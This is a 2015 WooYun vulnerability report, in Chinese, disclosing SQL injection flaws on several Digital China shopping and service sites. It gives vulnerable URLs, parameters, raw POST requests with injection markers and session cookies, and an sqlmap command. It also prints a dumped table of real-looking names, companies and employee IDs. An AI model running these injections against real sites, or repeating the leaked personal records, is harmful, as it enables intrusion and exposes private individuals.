神州数码某网上商城SQL注入大礼包 | wooyun-2015-0140585

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0140585

漏洞标题：

神州数码某网上商城SQL注入大礼包

漏洞详情

披露状态：

2015-09-13：细节已通知厂商并且等待厂商处理中
2015-09-14：厂商已经确认，细节仅向厂商公开
2015-09-24：细节向核心白帽子及相关领域专家公开
2015-10-04：细节向普通白帽子公开
2015-10-14：细节向实习白帽子公开
2015-10-19：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

详细说明：

神州数码思科网络加油站如下链接存在SQL注入，其中，gid参数有问题

http://www.ciscostation.com.cn/mall/mallhddise.jsp?gid=411

6个库

0x02
如下链接存在SQL注入漏洞，其中，cato参数有问题

POST /sp/showBrandDetail.do?brand=0&cato=03 and 1=1*&catt=0 HTTP/1.1
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.e-bridge.com.cn:80/
Cookie: JSESSIONID2=9fqOm-2v1GbV13mvBUEVx1fGbRkyEQK_xWsCu1B9A2mK13k1olS3!713506140!416110990; chgimg=1; 
cookie_prod_id=000000000259032885
Host: www.e-bridge.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 
Safari/537.21
Accept: */*
pageSize=10

泄露21个库

以BITS库为例，泄露254个表

表太多了，以SPM_BASEDEPART_PROCEDURE_TAB为例

其它的表不继续了
0x03
http://servexpress.digitalchina.com/sms/reg/login.asp
该页面呢根据机器序列号查询存在注入，oracle报错
POST /sms/reg/a.asp?func_id=Find&model=XIBM008&sn=1233 HTTP/1.1
Host: servexpress.digitalchina.com
Proxy-Connection: keep-alive
Content-Length: 0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Origin: http://servexpress.digitalchina.com
Accept: */*
Referer: http://servexpress.digitalchina.com/sms/reg/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCCTBCRTR=KHPFKMCBMICMIELAFDOODOIE; ASPSESSIONIDACQDDRTR=JPAAPCEBIBAKDEDOFLCINENM; ASPSESSIONIDCCSDCRSQ=OLKFKPPAOMPFHOAFJBLFPIKG
0x04
神州数码思科网络加油站如下链接存在SQL注入，其中，gid参数有问题

http://www.ciscostation.com.cn/mall/jdmerchandise.jsp?gid=2

6个库

漏洞证明：

qlmap.py -r enen.txt --dbs

Database: ERS
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| LOGIN_LIST | 4141728 |
| CUST | 2718576 |
| PERSON_INF | 2392669 |
| CCS_DELL_RESULT | 1154633 |
| MAIL | 1056855 |
| CCS_CASE | 854095 |
| ORGNIZATION_PROFILE | 316973 |
| CCS_AD_BILL | 260222 |
| CCS_AD_OPT_LOG | 116561 |
| DAY_LIST | 10000 |

修复方案：

以cisstation库、moneyjl表为例，发现大量订单信息

Database: cisstation
Table: moneyjl
[51 entries]
+----+---------------+-------+-----------------+---------------------------------+------------+----------+
| id | number        | sqrxm | sqrgs           | prize                           | stime      | proposer |
+----+---------------+-------+-----------------+---------------------------------+------------+----------+
| 33 | 1210233764000 | 柳萌    | 神州数码（中国）有限公司    | Apple Phone（或同等价值礼品）            | 2008-05-08 | SE6907   |
| 34 | 1212033986300 | 孔娜    | 北京安达信通系统集成有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-05-29 | SE4981   |
| 35 | 1212034028500 | 孔娜    | 北京安达信通系统集成有限公司  | Apple Phone（或同等价值礼品）            | 2008-05-29 | SE4981   |
| 36 | 1212034054700 | 孔娜    | 北京安达信通系统集成有限公司  | Sony PSP（或同等价值礼品）               | 2008-05-29 | SE4981   |
| 37 | 1212044933300 | 程娟    | 北京阳光世远科技发展有限公司  | 数码相机（或同等价值礼品）                   | 2008-05-29 | SE1229   |
| 38 | 1212045327000 | 杨征宇   | 深圳市新链路科技有限公司    | Apple Phone（或同等价值礼品）            | 2008-05-29 | SE1404   |
| 39 | 1213603970400 | 赵平英   | 北京明道泰和信息技术有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-06-16 | SE4257   |
| 40 | 1213608749800 | 孔娜    | 北京安达信通系统集成有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-06-16 | SE4981   |
| 41 | 1213608761100 | 孔娜    | 北京安达信通系统集成有限公司  | 任天堂NDS游戏机（或同等价值礼品）              | 2008-06-16 | SE4981   |
| 42 | 1213692506900 | 杨征宇   | 深圳市新链路科技有限公司    | 诺基亚 N95（或同等价值礼品）                | 2008-06-17 | SE1404   |
| 43 | 1213837620000 | 李静    | 陕西瑞金电子科技有限公司    | 笔记本电脑（或同等价值礼品）                  | 2008-06-19 | SE8414   |
| 44 | 1215540525400 | 王晨    | 上海蝶桥网络信息技术有限公司  | 诺基亚 N95（或同等价值礼品）                | 2008-07-09 | SE5104   |
| 45 | 1215540656800 | 王晨    | 上海蝶桥网络信息技术有限公司  | 诺基亚 N95（或同等价值礼品）                | 2008-07-09 | SE5104   |
| 46 | 1217819597400 | 赵平英   | 北京明道泰和信息技术有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-08-04 | SE4257   |
| 47 | 1220327281900 | 方庆美   | 北京惠友天利科技发展有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-09-02 | SE4653   |
| 48 | 1221715303100 | 陈霞    | 苏州南大苏富特科技有限公司   | 诺基亚 N95（或同等价值礼品）                | 2008-09-18 | SE1706   |
| 49 | 1222051736800 | 李静    | 陕西瑞金电子科技有限公司    | 笔记本电脑（或同等价值礼品）                  | 2008-09-22 | SE8414   |
| 50 | 1222225203600 | 周兆卿   | 北京通天至达科技发展有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-09-24 | WL1151   |
| 51 | 1222480500600 | 杨征宇   | 深圳市新链路科技有限公司    | 笔记本电脑（或同等价值礼品）                  | 2008-09-27 | SE1404   |
| 52 | 1223617186200 | 黄瑜    | 北京格林恒业科技有限公司    | 诺基亚 N95（或同等价值礼品）                | 2008-10-10 | SE1414   |
| 53 | 1223867038900 | 周兆卿   | 北京通天在线科贸有限公司    | 笔记本电脑（或同等价值礼品）                  | 2008-10-13 | SE7227   |
| 54 | 1223888182300 | 赵平英   | 北京明道泰和信息技术有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-10-13 | SE4257   |
| 55 | 1223964920700 | 周虹怡   | 上海国腾致瑞科技有限公司    | 笔记本电脑（或同等价值礼品）                  | 2008-10-14 | SE4223   |
| 56 | 1225079010900 | 吴娉    | 苏州工业园区纵横计算机有限公司 | 诺基亚 N95（或同等价值礼品）                | 2008-10-27 | SE8391   |
| 57 | 1225159736200 | 杨祝    | 安徽轻工国际贸易股份有限公司  | 任天堂NDS游戏机（或同等价值礼品）              | 2008-10-28 | SE5382   |
| 58 | 1225778150200 | 钱维娜   | 上海有为信息技术有限公司    | 诺基亚 N95（或同等价值礼品）                | 2008-11-04 | WL6875   |
| 59 | 1225778906200 | 方庆美   | 北京惠友天利科技发展有限公司  | 数码相机（或同等价值礼品）                   | 2008-11-04 | SE4653   |
| 60 | 1226454812500 | 胡敏    | 重庆怡讯网络技术有限公司    | 诺基亚 N95（或同等价值礼品）                | 2008-11-12 | SE6403   |
| 61 | 1226643245400 | 胡正刚   | 北京天正楦科网络技术有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-11-14 | SE4390   |
| 62 | 1226643257000 | 胡正刚   | 北京天正楦科网络技术有限公司  | 诺基亚 N95（或同等价值礼品）                | 2008-11-14 | SE4390   |
| 63 | 1227060073600 | 杨征宇   | 深圳市信德远致科技有限公司   | 任天堂NDS游戏机（或同等价值礼品）              | 2008-11-19 | SE7169   |
| 64 | 1227163068600 | 李静    | 陕西瑞金电子科技有限公司    | 笔记本电脑（或同等价值礼品）                  | 2008-11-20 | SE8414   |
| 65 | 1227520163600 | 于惊涛   | 上海三零卫士信息安全有限公司  | 诺基亚 N95（或同等价值礼品）                | 2008-11-24 | SE3436   |
| 66 | 1227576751900 | 金明乐   | 郑州创元计算机网络工程有限公司 | 数码相机（或同等价值礼品）                   | 2008-11-25 | SE1710   |
| 67 | 1227578325100 | 胡正刚   | 北京天正楦科网络技术有限公司  | 诺基亚 N95（或同等价值礼品）                | 2008-11-25 | SE4390   |
| 68 | 1227602260600 | 赵平英   | 北京明道泰和信息技术有限公司  | 笔记本电脑（或同等价值礼品）                  | 2008-11-25 | SE4257   |
| 69 | 1227666858000 | 飞翔    | 北京里奥卢夫广告有限公司    | 专家级工程师调用（可提供网络架构及项目咨询、工程师培训等服务） | 2008-11-26 | SE8512   |
| 70 | 1227667829400 | 武朋霞   | 北京雨禾盛科技有限公司     | 笔记本电脑（或同等价值礼品）                  | 2008-11-26 | SE7233   |
| 71 | 1228267495400 | 刘强    | 成都赛恩计算机网络技术有限公司 | 吹风机                             | 2008-12-03 | SE1462   |
| 72 | 1228267517500 | 刘强    | 成都赛恩计算机网络技术有限公司 | 超薄U盘                            | 2008-12-03 | SE1462   |
| 73 | 1228267666100 | 刘强    | 成都赛恩计算机网络技术有限公司 | 家用字母电话机                         | 2008-12-03 | SE1462   |
| 74 | 1228293385100 | 史伟鹏   | 北京鑫网杰通讯技术有限公司   | 床上四件套                           | 2008-12-03 | SE4951   |
| 75 | 1228293402300 | 史伟鹏   | 北京鑫网杰通讯技术有限公司   | 车载小冰箱                           | 2008-12-03 | SE4951   |
| 76 | 1228359392200 | 史伟鹏   | 北京鑫网杰通讯技术有限公司   | 卡西欧手表                           | 2008-12-04 | SE4951   |
| 77 | 1228381532600 | 丁琼    | 武汉汇通时代信息技术有限公司  | 吹风机                             | 2008-12-04 | SE4768   |
| 78 | 1228381565900 | 丁琼    | 武汉汇通时代信息技术有限公司  | 超薄U盘                            | 2008-12-04 | SE4768   |
| 79 | 1228467361300 | 史伟鹏   | 北京鑫网杰通讯技术有限公司   | 车载小冰箱                           | 2008-12-05 | SE4951   |
| 80 | 1228467405000 | 史伟鹏   | 北京鑫网杰通讯技术有限公司   | 床上四件套                           | 2008-12-05 | SE4951   |
| 81 | 1228814864900 | 王英杰   | 北京世纪华风科技发展有限公司  | 熨斗                              | 2008-12-09 | SE8376   |
| 82 | 1228815002600 | 王英杰   | 北京世纪华风科技发展有限公司  | 超薄U盘                            | 2008-12-09 | SE8376   |
| 83 | 1228815052300 | 王英杰   | 北京世纪华风科技发展有限公司  | 多功能读卡器                          | 2008-12-09 | SE8376   |
+----+---------------+-------+-----------------+---------------------------------+------------+----------+

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-09-14 09:24

厂商回复：

尽快处理！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源深度安全实验室@乌云